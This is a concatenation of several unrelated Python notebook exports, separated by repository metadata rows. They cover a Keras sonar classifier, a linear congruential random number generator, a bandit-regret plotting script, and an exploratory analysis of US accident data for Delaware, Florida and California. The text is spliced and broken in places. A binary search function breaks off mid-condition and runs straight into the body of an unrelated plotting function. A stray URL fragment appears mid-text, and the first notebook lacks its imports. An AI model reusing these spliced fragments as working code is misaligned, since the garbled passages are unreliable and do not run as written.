from sklearn.model_selection import cross_val_score
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import StratifiedKFold
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import Pipeline
from keras.initializers import random_normal
# + id="hrfjUlS2mEvT" colab_type="code" colab={}
# fix random seed for reproducibility of weight init and CV shuffling
seed = 7
numpy.random.seed(seed)
# + id="nncPBNJcmISo" colab_type="code" colab={}
# load dataset (no header: 60 feature columns followed by the class label)
dataframe = pandas.read_csv("sonar.csv", header=None)
dataset = dataframe.values
# split into input (X) and output (Y) variables:
# columns 0-59 are the numeric sonar readings, column 60 is the label ('M'/'R')
X = dataset[:,0:60].astype(float)
Y = dataset[:,60]
# + id="Lr3EEOZOmXhm" colab_type="code" outputId="36b10c60-fc3f-412e-e24b-3b4327ae3125" colab={"base_uri": "https://localhost:8080/", "height": 323.0}
# Encode the string class labels (column 60 of the sonar data) as integers.
le = LabelEncoder()
# fit_transform both learns the label vocabulary and applies the mapping in
# one pass; the original called fit() and then fit_transform(), fitting the
# encoder twice for no benefit.
encoded_Y = le.fit_transform(Y)
print(Y)
print(encoded_Y)
# + id="uQrazq1-rQ4k" colab_type="code" colab={}
# Kept for backward compatibility with any cells referencing these names
# directly; the builder below no longer mutates this shared model.
model = Sequential()
Gaussian = random_normal()

def create_baseline():
    """Build and compile the baseline sonar classifier.

    A fresh Sequential model is created on every call. This matters because
    KerasClassifier invokes build_fn once per cross-validation fold; the
    original added layers to a single module-level model, so each fold kept
    stacking Dense layers onto the same ever-growing network.

    Returns:
        Compiled Keras model: 60-unit ReLU hidden layer -> 1-unit sigmoid
        output, trained with Adam on binary cross-entropy.
    """
    net = Sequential()
    net.add(Dense(60, kernel_initializer=Gaussian, activation='relu', input_dim=60))
    net.add(Dense(1, activation='sigmoid'))
    # Binary classification: log-loss objective with accuracy reporting.
    net.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])
    return net
# + id="cfnTL9I-xB2v" colab_type="code" outputId="ce71f889-4e12-48c4-be95-1d89ed8640de" colab={"base_uri": "https://localhost:8080/", "height": 34.0}
# Evaluate the baseline network with 10-fold stratified cross-validation.
# NOTE(review): build_fn is rebuilt once per fold by KerasClassifier --
# confirm create_baseline constructs a fresh model each call rather than
# mutating a shared one.
estimator = KerasClassifier(build_fn=create_baseline, epochs=100, batch_size=5, verbose=0)
kfold = StratifiedKFold(n_splits=10, shuffle=True, random_state=seed)
results = cross_val_score(estimator, X, encoded_Y, cv=kfold)
# Report mean and standard deviation of fold accuracies as percentages.
print("Results: %.2f%% (%.2f%%)" % (results.mean()*100, results.std()*100))
# + id="ISQfdFH_LMmP" colab_type="code" outputId="02d24113-7ad9-4a60-9e80-11cbb92fdaea" colab={"base_uri": "https://localhost:8080/", "height": 34.0}
# Re-evaluate with per-fold feature standardization: wrapping StandardScaler
# and the classifier in a Pipeline ensures scaling statistics are fit only on
# each training fold (no leakage into the validation fold).
numpy.random.seed(seed)
estimators = []
estimators.append(('standardize', StandardScaler()))
estimators.append(('mlp', KerasClassifier(build_fn=create_baseline, epochs=100, batch_size=5, verbose=0)))
pipeline = Pipeline(estimators)
kfold = StratifiedKFold(n_splits=10, shuffle=True, random_state=seed)
results = cross_val_score(pipeline, X, encoded_Y, cv=kfold)
# Report mean and standard deviation of fold accuracies as percentages.
print("Standardized: %.2f%% (%.2f%%)" % (results.mean()*100, results.std()*100))
# + id="x19cpyiasUqp" colab_type="code" colab={}
| 10,750 |
/Random number generetor.ipynb
|
d36838a683cbeccd360ba666baea6d4c7a9e9350
|
[] |
no_license
|
ersangit01/Thesis
|
https://github.com/ersangit01/Thesis
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 2,445 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Program to generate random number
# # Linear Congural random number generetor
# +
import math
import numpy as np
from decimal import Decimal
import random
import pandas as pd
def gen_linear(a, seed, c, m, n=32):
    """Generate n pseudo-random floats in [0, 1) with a linear congruential
    generator: x_{k+1} = (a * x_k + c) mod m.

    The recurrence state is kept as an integer, and each state is scaled by
    1/m only when stored. (The original divided the state itself by m after
    every step, so subsequent iterations no longer followed the integer LCG
    recurrence the function's name promises.)

    Args:
        a: multiplier.
        seed: initial integer state x_0.
        c: increment.
        m: modulus; also the normalisation factor for the output.
        n: number of values to generate (default 32, matching the original
           hard-coded loop count).

    Returns:
        numpy array of n floats in [0, 1).
    """
    x = seed
    res = []
    for _ in range(n):
        x = (a * x + c) % m          # integer LCG step
        res.append(x / m)            # normalise into [0, 1)
    return np.array(res)
# LCG parameters. NOTE(review): the original inline note "suitable range is
# from 12-23" does not match a=2175143 -- confirm the intended multiplier.
a=2175143
X0=3553    # seed (initial state)
c=10653    # increment
m=1000000  # modulus / normalisation factor
res=gen_linear(a,X0,c,m)
r_number=res
print(r_number)
# Bare expression: displays the array dtype as notebook cell output.
r_number.dtype
# Dead experimentation kept from the notebook (rounding each value to 2 dp):
# r_number.dtype()
# for i in range(0,32):
#     temp1=(r_number[i])
#     temp2=round(temp1,2)
#     value=np.append(value,temp2)
# print(value)
| 993 |
/Exploratory Data Analysis for the DE, FL & CA data.ipynb
|
1918ef94ee704cfaf2aa7b8b78358b84f2d3be42
|
[] |
no_license
|
biggymuticha/us-accidents
|
https://github.com/biggymuticha/us-accidents
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 2,771,191 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# argv:
# - /home/ketchup/tools/anaconda3/bin/python
# - -m
# - ipykernel_launcher
# - -f
# - '{connection_file}'
# display_name: Python 3
# env: null
# interrupt_mode: signal
# language: python
# metadata: null
# name: python3
# ---
# define function is always the first step
def binary_search(list, item):
low = 0
high = len(list) - 1
while low
k in regrets_dict:
regrets_dict[k] = ('','')
for r_str in r_str_tuple:
if '_CNUCB_' in r_str:
regrets_dict['CN-UCB'] = (r_str, '.')
elif '_CNTS(M=1)_' in r_str:
regrets_dict['CN-TS(M=1)'] = (r_str, 'x')
elif '_CNTS_' in r_str:
regrets_dict['CN-TS'] = (r_str, '+')
elif '_CombLinUCB_' in r_str:
regrets_dict['CombLinUCB'] = (r_str, 's')
elif '_CombLinTS_' in r_str:
regrets_dict['CombLinTS'] = (r_str, 'd')
def plot(T, h, d, m, regrets_dict, save=False):
    """Plot mean cumulative regret (with std error bars) per algorithm.

    Args:
        T: number of rounds (length of the x-axis).
        h: key of the hidden reward function ('h1'..'h4'); selects the
           LaTeX title string.
        d: context dimension (used in the title only).
        m: network width (used in the title only).
        regrets_dict: maps algorithm label -> (regret-file stem, marker).
            An empty stem means no results were recorded for that algorithm.
        save: when True, also write the figure to plots/<h>-<d>-<m>.png.
    """
    # LaTeX strings for the four hidden reward functions.
    hidden_by_key = {
        "h1": r'$h_{1}(\mathbf{x}) = \mathbf{x}^{\top}\mathbf{a}$',
        "h2": r'$h_{2}(\mathbf{x}) = (\mathbf{x}^{\top}\mathbf{a})^{2}$',
        "h3": r'$h_{3}(\mathbf{x}) = \cos(\pi \mathbf{x}^{\top}\mathbf{a})$',
        "h4": r'$h_{4}(\mathbf{x}) = \sin(\pi \mathbf{x}^{\top}\mathbf{a})$',
    }
    hidden = hidden_by_key[h]

    plt.style.use('default')
    rounds = np.arange(1, T + 1)
    # Show markers/error bars at 10 evenly spaced rounds to avoid clutter.
    marker_every = int(T / 10)

    for algo_label, (stem, marker) in regrets_dict.items():
        if not stem:
            continue  # no result file recorded for this algorithm
        # (L x T) array: L repeated experiments, T rounds each.
        runs = np.load('regrets/' + stem + '.npy')
        mean_regret = runs.mean(axis=0)
        std_regret = runs.std(axis=0)
        plt.errorbar(rounds, mean_regret, std_regret,
                     errorevery=marker_every, marker=marker,
                     markevery=marker_every, label=algo_label,
                     markersize=6, linewidth=2, elinewidth=1, capsize=3)

    plt.grid(color='0.85')
    plt.xlabel('Round ($t$)', size=14)
    plt.ylabel('Cumulative Regret', size=14)
    plt.title(r'{}, $d$={}, $m$={}'.format(hidden, d, m), size=14)
    plt.legend(loc='upper left', prop={'size': 12})
    plt.tick_params(labelsize=12)
    if save:
        plt.savefig('plots/' + f'{h}-{d}-{m}' + '.png')
# -
# Experiment configuration: T rounds, context dimension d, network width m,
# hidden reward function h3 (cosine).
T = 2000
d = 80
m = 40
h = 'h3'
# Earlier single/two-algorithm runs kept for reference:
#set_regrets_dict(f'reg_{h}_CNUCB_{d}_{m}')
# set_regrets_dict(f'reg_{h}_CNUCB_{d}_{m}', f'reg_{h}_CNTS_{d}_{m}')
# Populate the module-level regrets_dict from the saved result-file stems,
# then render and save the comparison figure.
set_regrets_dict(f'reg_{h}_CNUCB_{d}_{m}', f'reg_{h}_CNTS(M=1)_{d}_{m}', f'reg_{h}_CNTS_{d}_{m}')
plot(T, h, d, m, regrets_dict, save=True)
ps://github.com/RonghuiZhou/us-accidents
# ### Step 1. Import libraries
# Import numpy, pandas, matpltlib.pyplot, sklearn modules and seaborn
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from datetime import date
# %matplotlib inline
pd.set_option('display.max_rows', 200)
pd.set_option('display.max_columns', 200)
plt.style.use('ggplot')
# ### Step 2. Parameters, dataset and data manipulation
#
# #### A. Define parameters
# +
# Define lists of states, colors, linestyles, month order, day order, and hour order.
# This notebook focuses on three states: DE, FL, & CA.
state_lst=['DE','FL','CA']
state_lst_full=['Delaware','Florida','California']
# Only accident severities 2, 3 & 4 are analyzed.
severity_lst=[2,3,4]
# Colors, markers and linestyles -- parallel to state_lst (one style per state).
color_lst=['r','b','k']
marker_lst=['D','o','*']
linestyle_lst=['dashed','dashdot','solid']
# Month/weekday/hour orderings used to reindex groupby results, plus the
# column name for the time taken to clear each accident.
month_lst = [ 'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul','Aug','Sep','Oct','Nov','Dec']
weekday_lst = [ 'Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']
weekday_lst_full = [ 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']
hour_lst= np.arange(24)
td='Time_Duration(min)'
# -
# ### Step 2. Parameters, dataset and data manipulation
#
# #### B. Import the dataset
# Import the data, keep only the states of interest (DE/FL/CA), and display
# the first 5 rows as notebook output.
df = pd.read_csv('./US_Accidents_May19.csv')
df = df[df.State.isin(state_lst)]
df.head()
# ### Step 2. Parameters, dataset and data manipulation
#
# #### C. Data manipulation: extract year, month, day, hour, weekday, and time to clear accidents
# +
# Extract year, month, day, hour, & weekday information.
# Convert Start_Time and End_Time to datetimes; unparseable values become NaT.
df['Start_Time'] = pd.to_datetime(df['Start_Time'], errors='coerce')
df['End_Time'] = pd.to_datetime(df['End_Time'], errors='coerce')
# Derive calendar features from the accident start time.
df['Start_Year']=df['Start_Time'].dt.year
df['Start_Month']=df['Start_Time'].dt.strftime('%b')
df['Start_Day']=df['Start_Time'].dt.day
df['Start_Hour']=df['Start_Time'].dt.hour
df['Start_Weekday']=df['Start_Time'].dt.strftime('%a')
# Time taken to clear each accident, in minutes, rounded to the nearest
# integer. (td is re-assigned here with the same value it already holds.)
td='Time_Duration(min)'
df[td]=round((df['End_Time']-df['Start_Time'])/np.timedelta64(1,'m'))
# Check the dataframe
df.head()
# -
# ### Step 3. Exploratory Data Analysis -- General
#
# #### Accident visualization A: accident map
# Visualization: scatter of accident start coordinates, colored by state.
sns.scatterplot(x='Start_Lng', y='Start_Lat', data=df, hue='State')
plt.xlabel('Longitude')
# Fixed: the original label carried a stray closing parenthesis ('Latitude)').
plt.ylabel('Latitude')
plt.show()
# ### Step 3. Exploratory Data Analysis -- General
#
# #### Accident visualization B: time series analysis, resample by month
# Check the beginning and end date of this dataset
print('This dataset contains data beween {} and {}.'.format(df.Start_Time.min(),df.Start_Time.max()))
# #### How many days (Monday-Sunday) between the beginning and end of this dataset?
# +
# Count how many of each calendar weekday (Monday-Sunday) fall between the
# first and last accident timestamps in the dataset.
calendar_weekday_num=[]
d1=df.Start_Time.min()
d2=df.Start_Time.max()
# i = 0..6 maps to Monday..Sunday (date.weekday() convention).
for i in range(7):
    count = 0
    # Walk every calendar day in [d1, d2] via ordinal day numbers.
    for d_ord in range(d1.toordinal(), d2.toordinal()+1):
        d = date.fromordinal(d_ord)
        if (d.weekday() == i):
            count += 1
    calendar_weekday_num.append(count)
print('Number of days for Monday-Sunday: {}.'.format(calendar_weekday_num))
print('Total number of days between {} and {}: {} days.'.format(d1,d2,sum(calendar_weekday_num)))
# -
# #### How many unique days with accidents for each state in this dataset?
# +
# Count the unique calendar days on which at least one accident occurred.
# Split each timestamp string on the space and keep the date part.
allday_lst=df.Start_Time.astype(str).str.split(' ')
allday_lst2=[item[0] for item in allday_lst]
# Fixed: the original message hard-coded "New Jersey, Pennsylvania, & New
# York" although the selected states are DE, FL & CA; build the message from
# state_lst_full so it always matches the data actually loaded.
print('For the three states of {} in this dataset:'.format(', '.join(state_lst_full)))
print('There are {} total accidents.'.format(df.shape[0]))
print('There are {} total days.'.format(len(allday_lst2)))
print('There are {} unique days.'.format(len(set(allday_lst2))))
print('On average, there are {} accidents per day.'.format(round(df.shape[0]/len(set(allday_lst2)))))
# -
# #### How many unique days with accident for each weekday/weekend for each state in this dataset?
# +
# For each state, find out how many unique days for each weekday/weekend
# Initialize an empty list to hold the number of days for each weekday/weekend for the three states
weekday_num_state=[]
# Run a for loop for the list of states: NJ, PA, & NY
for state in state_lst:
# Initialize an empty list to hold the number of days for each weekday
weekday_num=[]
# Run a for loop for the whole week
for weekday in weekday_lst:
# Slice the dataframe for specific state & weekday
df_weekday=df[(df['State']==state) & (df.Start_Weekday==weekday)]
# For each weekday, extract the day information from the Start_Time column, by separating the datetime into day and hour
day_lst1=df_weekday.Start_Time.astype(str).str.split(' ')
# Extract the first item which is the day information
day_lst2=[item[0] for item in day_lst1]
# Append the day into the list weekday_num
weekday_num.append(len(set(day_lst2)))
# Append the day with state information encoded into the list weekday_num_state
weekday_num_state.append(weekday_num)
print('For the states of {}, here is the list of numbers of weekdays (Mon-Sun): {}.'.format(state_lst,weekday_num_state))
# +
# For each state, compute the percentage of calendar days (per weekday) on
# which at least one accident occurred: accident-days / calendar-days * 100.
day_pct_lst=[]
for i,state in enumerate(state_lst):
    day_pct=[round(int(item1)/int(item2),2)*100 for item1,item2 in zip(weekday_num_state[i],calendar_weekday_num)]
    day_pct_lst.append(day_pct)
    print('For the state of {}, the percentage of days with accident during this period in the data set: {}%.'.format(state_lst[i], day_pct))
print(day_pct_lst)
# -
# #### Time series analysis, resample by month
# +
# Time series analysis: accident counts resampled by month, one subplot per state.
# Start_Time must be the index for pandas resampling to work.
df.set_index('Start_Time',drop=True,inplace=True)
# Set the size of the figure
fig= plt.figure(figsize=(15,6))
# One subplot per state, styled with the matching linestyle/color.
for i,state in enumerate(state_lst):
    # Set a sub plot
    plt.subplot(1, 3, 1+i)
    # Monthly accident counts for this state.
    df[df['State']==state].resample('M').count()['ID'].plot(linestyle=linestyle_lst[i], color=color_lst[i])
    # Hard-coded display window covering the dataset's span.
    plt.xlim('2016','2019-Mar')
    plt.xlabel('Year')
    plt.title('{}'.format(state))
plt.show()
# Reset the index back for further data analysis
df.reset_index(inplace=True)
# -
# ### Step 3. Exploratory Data Analysis -- General
#
# #### Accident visualization C: accident severity distribution for each state
# Overall severity counts, most frequent first (notebook cell output).
df.Severity.value_counts().sort_values(ascending=False)
# +
# Pie charts of accident severity distribution, one per state.
feature='Severity'
# Set the size of the figure
fig= plt.figure(figsize=(15,6))
# Slices at or below this percentage get no label/value (0 -> show all here).
pct_cutoff=0
# autopct callback: show the value only above the cutoff percentage.
def my_autopct(pct):
    return ('%1.0f%%' % pct) if pct > pct_cutoff else ''
# One pie per state.
for i,state in enumerate(state_lst):
    # Set a sub plot
    plt.subplot(1, 3, 1+i)
    # Normalized severity proportions for this state.
    df_temp=df[df['State']==state][feature].value_counts(normalize=True).round(2)
    # Labels: blank out slices at/below the cutoff fraction.
    labels = [n if v > pct_cutoff/100 else ''
              for n, v in zip(df_temp.index, df_temp)]
    # Generate the pie plot
    plt.pie(df_temp, labels=labels, autopct=my_autopct, shadow=True)
    # Equal aspect keeps the pie circular.
    plt.axis('equal')
    plt.xlabel(feature)
    plt.title(state)
plt.tight_layout()
plt.show()
# -
# ### Step 3. Exploratory Data Analysis -- General
#
# #### Accident visualization D: how long does it take to clear the accident?
# +
# Median time to clear an accident, per state, for severities 2/3/4.
# Outliers beyond n*IQR are replaced with the median before aggregating.
median_lst_state_severity=[]
# Outer loop: one sublist of per-state medians per severity level.
for i,severity in enumerate(severity_lst):
    median_lst_state=[]
    for j,state in enumerate(state_lst):
        # Slice the dataframe for this state & severity.
        df_temp=df[(df['State']==state) & (df['Severity']==severity)]
        # Quartiles and interquartile range of the clear-time column.
        df_25=df_temp[td].quantile(.25)
        df_50=df_temp[td].quantile(.5)
        df_75=df_temp[td].quantile(.75)
        df_iqr=df_75-df_25
        # print('1Q: {}; 3Q: {}; IQR: {}.'.format(df_25,df_75,df_iqr))
        df_temp_lst=df_temp[td].tolist()
        # Outlier criterion: outside [Q1 - n*IQR, Q3 + n*IQR]; such values
        # are replaced with the median rather than dropped.
        n=3
        df_temp_lst=[item if ((item >= df_25 - n * df_iqr) & (item <= df_75 + n * df_iqr)) else df_50 for item in df_temp_lst]
        df_temp_lst=pd.Series(df_temp_lst)
        # Median after outlier replacement.
        median_lst_state.append(df_temp_lst.median())
    median_lst_state_severity.append(median_lst_state)
print('State list: {}; Severity list: {}.'.format(state_lst,severity_lst))
# Set the size of the figure
fig= plt.figure(figsize=(5,6))
# NOTE(review): x_ticks length equals the number of severities (3), which
# happens to match the number of states plotted on the x-axis -- confirm.
x_ticks=np.arange(len(median_lst_state_severity))
# Broken y-axis: top panel (ax) for the outlier band, bottom (ax2) for the
# bulk of the data.
f, (ax, ax2) = plt.subplots(2, 1, sharex=True)
for i in range(len(median_lst_state_severity)):
    # pts = per-state medians for severity i.
    pts=median_lst_state_severity[i]
    # Plot the same data on both axes; each axis will show its own y-range.
    ax.plot(x_ticks, pts,linestyle=linestyle_lst[i], color=color_lst[i], marker=marker_lst[i])
    ax2.plot(x_ticks, pts,linestyle=linestyle_lst[i], color=color_lst[i], marker=marker_lst[i])
# zoom-in / limit the view to different portions of the data
ax.set_ylim(350, 370) # outliers only
ax2.set_ylim(20, 50) # most of the data
# hide the spines between ax and ax2
ax.spines['bottom'].set_visible(False)
ax2.spines['top'].set_visible(False)
ax.xaxis.tick_top()
# NOTE(review): labeltop expects a bool in newer matplotlib; 'off' is the
# legacy string form -- confirm against the pinned matplotlib version.
ax.tick_params(labeltop='off') # don't put tick labels at the top
ax2.xaxis.tick_bottom()
# Draw the small diagonal "cut" marks at the break. In axes coordinates the
# spine endpoints are (0,0)..(1,1), so the diagonals go in each corner with
# clipping disabled.
d = .015 # how big to make the diagonal lines in axes coordinates
# arguments to pass to plot, just so we don't keep repeating them
kwargs = dict(transform=ax.transAxes, color='k', clip_on=False)
ax.plot((-d, +d), (-d, +d), **kwargs,label='_nolegend_') # top-left diagonal
ax.plot((1 - d, 1 + d), (-d, +d), **kwargs,label='_nolegend_') # top-right diagonal
kwargs.update(transform=ax2.transAxes) # switch to the bottom axes
ax2.plot((-d, +d), (1 - d, 1 + d), **kwargs,label='_nolegend_') # bottom-left diagonal
ax2.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs,label='_nolegend_') # bottom-right diagonal
# The diagonals track the spines if the subplot spacing changes
# (f.subplots_adjust(hspace=...)).
# Set labels, limit, legend, title and xticks
plt.xlabel('State')
plt.ylabel('Time (minutes)')
ax2.legend(['Severity: 2','Severity: 3','Severity: 4'],loc="best")
plt.xticks(np.arange(len(median_lst_state_severity)),(state_lst))
plt.title('How long does it take to clear the accident?')
plt.show()
# -
# ## How You Can Avoid Accident in 2020?
# ### Step 4. Exploratory Data Analysis -- WWW (When, Where, & Weather)
#
# #### Question 1: When do most accidents happen?
#
# ##### A. Daytime versus nighttime
# +
# Pie charts of day vs. night accidents (Sunrise_Sunset column), one per state.
feature='Sunrise_Sunset'
# Set the size of the figure
fig= plt.figure(figsize=(15,6))
# Slices at or below this percentage get no label/value.
pct_cutoff=2
# autopct callback: show the value only above the cutoff percentage.
def my_autopct(pct):
    return ('%1.0f%%' % pct) if pct > pct_cutoff else ''
# One pie per state.
for i,state in enumerate(state_lst):
    # Set a sub plot
    plt.subplot(1, 3, 1+i)
    # Normalized Day/Night proportions for this state.
    df_temp=df[df['State']==state][feature].value_counts(normalize=True).round(2)
    # Labels: blank out slices at/below the cutoff fraction.
    labels = [n if v > pct_cutoff/100 else ''
              for n, v in zip(df_temp.index, df_temp)]
    # Generate the pie plot
    plt.pie(df_temp, labels=labels, autopct=my_autopct, shadow=True)
    # Equal aspect keeps the pie circular.
    plt.axis('equal')
    plt.xlabel(feature)
    plt.title(state)
plt.tight_layout()
plt.show()
# -
# ### Step 4. Exploratory Data Analysis -- WWW (When, Where, & Weather)
#
# #### Question 1: When do most accidents happen?
#
# ##### B. Weekday versus weekend
# +
# Bar charts: raw accident counts per weekday for each selected state
# (DE, FL & CA -- the original comment's NJ/PA/NY reference was stale).
fig= plt.figure(figsize=(15,6))
for i,state in enumerate(state_lst):
    plt.subplot(1, 3, 1+i)
    # Count accidents per weekday, reordered Mon..Sun via reindex.
    df[df['State']==state].groupby('Start_Weekday').count()['ID'].reindex(weekday_lst).plot(kind='bar',color=color_lst[i]).set_title(state)
    plt.xlabel('')
    # Only display the ylabel on the leftmost plot.
    if i==0:
        plt.ylabel('Number of accidents')
# +
# Bar charts: accidents PER DAY for each weekday -- total weekday counts
# divided by the number of unique days that weekday occurs (weekday_num_state).
# Set the size of the figure
fig= plt.figure(figsize=(15,6))
# One subplot per state.
for i,state in enumerate(state_lst):
    # Set a sub plot
    plt.subplot(1, 3, 1+i)
    # Total accidents per weekday, ordered Mon..Sun.
    df_temp=df[df['State']==state].groupby('Start_Weekday').count()['ID'].reindex(weekday_lst)
    # checkpoint
    # print('df_temp:', df_temp)
    # print('weekday_num_state[i]:',weekday_num_state[i])
    # Normalize: accidents per weekday / unique days of that weekday.
    df_temp2=[round(int(item1)/int(item2)) for item1,item2 in zip(df_temp,weekday_num_state[i])]
    # checkpoint
    # print('df_temp2:', df_temp2)
    # Convert the list to a pandas Series for plotting.
    df_temp2=pd.Series(df_temp2)
    # Bar plot with the state's assigned color and the state as title.
    df_temp2.plot(kind='bar',color=color_lst[i]).set_title(state)
    # Remove xlabels
    plt.xlabel('')
    # Replace the integer xticks with weekday names.
    plt.xticks(np.arange(7),weekday_lst)
    # Only display the ylabel on the leftmost plot.
    if i==0:
        plt.ylabel('Number of accidents')
# +
# Pie-chart variant of the accidents-per-day-by-weekday analysis above.
# (The "severity for each location" comment below appears to be a stale
# copy-paste from another cell -- this cell plots weekday distributions.)
feature='Start_Weekday'
fig_x=len(state_lst)
# Normalize total counts by the number of unique days per weekday.
# Set the size of the figure
fig= plt.figure(figsize=(5*fig_x,6))
# Slices at or below this percentage get no label/value.
pct_cutoff=2
# autopct callback: show the value only above the cutoff percentage.
def my_autopct(pct):
    return ('%1.0f%%' % pct) if pct > pct_cutoff else ''
# One pie per state.
for i,state in enumerate(state_lst):
    # Set a sub plot
    plt.subplot(1, 3, 1+i)
    # Total accidents per weekday, ordered Mon..Sun.
    df_temp=df[df['State']==state].groupby('Start_Weekday').count()['ID'].reindex(weekday_lst)
    # checkpoint
    # print('df_temp:', df_temp)
    # print('weekday_num_state[i]:',weekday_num_state[i])
    # Normalize: accidents per weekday / unique days of that weekday.
    df_temp2=[round(int(item1)/int(item2)) for item1,item2 in zip(df_temp,weekday_num_state[i])]
    # checkpoint
    # print('df_temp2:', df_temp2)
    # Convert the list to a pandas Series for plotting.
    df_temp2=pd.Series(df_temp2)
    # df_temp2.plot(kind='bar',color=color_lst[i]).set_title(state)
    # Labels come from the raw counts; blank out slices at/below the cutoff.
    labels = [n if v > pct_cutoff/100 else '' for n, v in zip(df_temp.index, df_temp)]
    # Generate the pie plot
    plt.pie(df_temp2, labels=labels, autopct=my_autopct, shadow=True)
    # Equal aspect keeps the pie circular.
    plt.axis('equal')
    plt.xlabel('Weekday/Weekend')
    plt.title(state)
plt.tight_layout()
plt.show()
# -
# ### Step 4. Exploratory Data Analysis -- WWW (When, Where, & Weather)
#
# #### Question 1: When do most accidents happen?
#
# ##### C. Rush hour
# +
# Hourly distribution of accidents on all days, weekdays, and weekends
# for the three states (DE, FL, CA).
fig = plt.figure(figsize=(18, 6))

# --- All days ---
plt.subplot(1, 3, 1)
# Per-state hourly accident counts, reordered by hour of day.
df[df['State']=='DE'].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='dashed', color='r')
df[df['State']=='FL'].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='dashdot', color='b')
df[df['State']=='CA'].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='solid', color='k')
plt.ylabel('Number of accidents')
plt.xlabel('Hour')
plt.legend(['DE', 'FL', 'CA'])
plt.title('All days')
plt.xticks(np.arange(0, 24, step=2))

# --- Weekdays (Mon-Fri) ---
plt.subplot(1, 3, 2)
df[(df['State']=='DE') & (df['Start_Weekday'].isin(weekday_lst[:5]))].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='dashed', color='r')
df[(df['State']=='FL') & (df['Start_Weekday'].isin(weekday_lst[:5]))].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='dashdot', color='b')
df[(df['State']=='CA') & (df['Start_Weekday'].isin(weekday_lst[:5]))].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='solid', color='k')
plt.xlabel('Hour')
plt.legend(['DE', 'FL', 'CA'])
# BUG FIX: the title was misspelled 'Weedays'.
plt.title('Weekdays')
plt.xticks(np.arange(0, 24, step=2))

# --- Weekends (Sat-Sun) ---
plt.subplot(1, 3, 3)
df[(df['State']=='DE') & (df['Start_Weekday'].isin(weekday_lst[5:]))].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='dashed', color='r')
df[(df['State']=='FL') & (df['Start_Weekday'].isin(weekday_lst[5:]))].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='dashdot', color='b')
df[(df['State']=='CA') & (df['Start_Weekday'].isin(weekday_lst[5:]))].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='solid', color='k')
plt.xlabel('Hour')
plt.legend(['DE', 'FL', 'CA'])
plt.title('Weekends')
plt.xticks(np.arange(0, 24, step=2))
plt.tight_layout()
plt.show()
# +
# Hourly distribution of accidents per day, broken down by severity.
# Grid layout: rows = all days / weekdays / weekends, columns = severity 2, 3, 4.
feature = 'Severity'
feature2 = ['All days', 'Weekdays', 'Weekends']
severity_lst = [2, 3, 4]
fig_x = len(state_lst)
fig_y = len(severity_lst)
fig_z = len(feature2)
# Set the size of the figure
fig = plt.figure(figsize=(5 * fig_z, 6 * fig_y))
for i, severity in enumerate(severity_lst):
    ### ###
    # All days
    plt.subplot(fig_z, fig_y, i + 1)
    for j, state in enumerate(state_lst):
        # Hourly accident counts for this state and severity.
        df_temp = df[(df['State'] == state) & (df['Severity'] == severity)].groupby('Start_Hour').count()['ID'].reindex(hour_lst)
        # BUG FIX: normalise by the day counts of *this state* (index j).
        # The severity index i was used before, mixing states' day counts.
        df_temp = df_temp / sum(weekday_num_state[j])
        df_temp.plot(linestyle=linestyle_lst[j], color=color_lst[j])
    plt.xlabel('Hour')
    plt.ylabel('Number of accidents')
    plt.legend(['DE', 'FL', 'CA'])
    plt.title('All days' + ': severity-' + str(severity))
    plt.xticks(np.arange(0, 24, step=2))
    ### ###
    # Weekdays (Mon-Fri)
    plt.subplot(fig_z, fig_y, i + 1 + fig_y)
    for j, state in enumerate(state_lst):
        df_temp = df[(df['State'] == state) & (df['Severity'] == severity) & (df['Start_Weekday'].isin(weekday_lst[:5]))].groupby('Start_Hour').count()['ID'].reindex(hour_lst)
        # BUG FIX: state index j, weekday (Mon-Fri) day counts only.
        df_temp = df_temp / sum(weekday_num_state[j][:5])
        df_temp.plot(linestyle=linestyle_lst[j], color=color_lst[j])
    plt.xlabel('Hour')
    plt.ylabel('Number of accidents')
    plt.legend(['DE', 'FL', 'CA'])
    plt.title('Weekdays' + ': severity-' + str(severity))
    plt.xticks(np.arange(0, 24, step=2))
    ### ###
    # Weekends (Sat-Sun)
    plt.subplot(fig_z, fig_y, i + 1 + fig_y + fig_y)
    for j, state in enumerate(state_lst):
        df_temp = df[(df['State'] == state) & (df['Severity'] == severity) & (df['Start_Weekday'].isin(weekday_lst[5:]))].groupby('Start_Hour').count()['ID'].reindex(hour_lst)
        # BUG FIX: state index j, weekend (Sat-Sun) day counts only.
        df_temp = df_temp / sum(weekday_num_state[j][5:])
        df_temp.plot(linestyle=linestyle_lst[j], color=color_lst[j])
    plt.xlabel('Hour')
    plt.ylabel('Number of accidents')
    plt.legend(['DE', 'FL', 'CA'])
    plt.title('Weekends' + ': severity-' + str(severity))
    plt.xticks(np.arange(0, 24, step=2))
plt.tight_layout()
plt.show()
# +
# Hourly distribution of accidents on each weekday (Mon-Fri) for DE, FL, CA.
# Set the size of the figure
fig = plt.figure(figsize=(30, 6))
n = 5
# Make subplots on each weekday with a for loop
for i in range(n):
    plt.subplot(1, 5, i + 1)
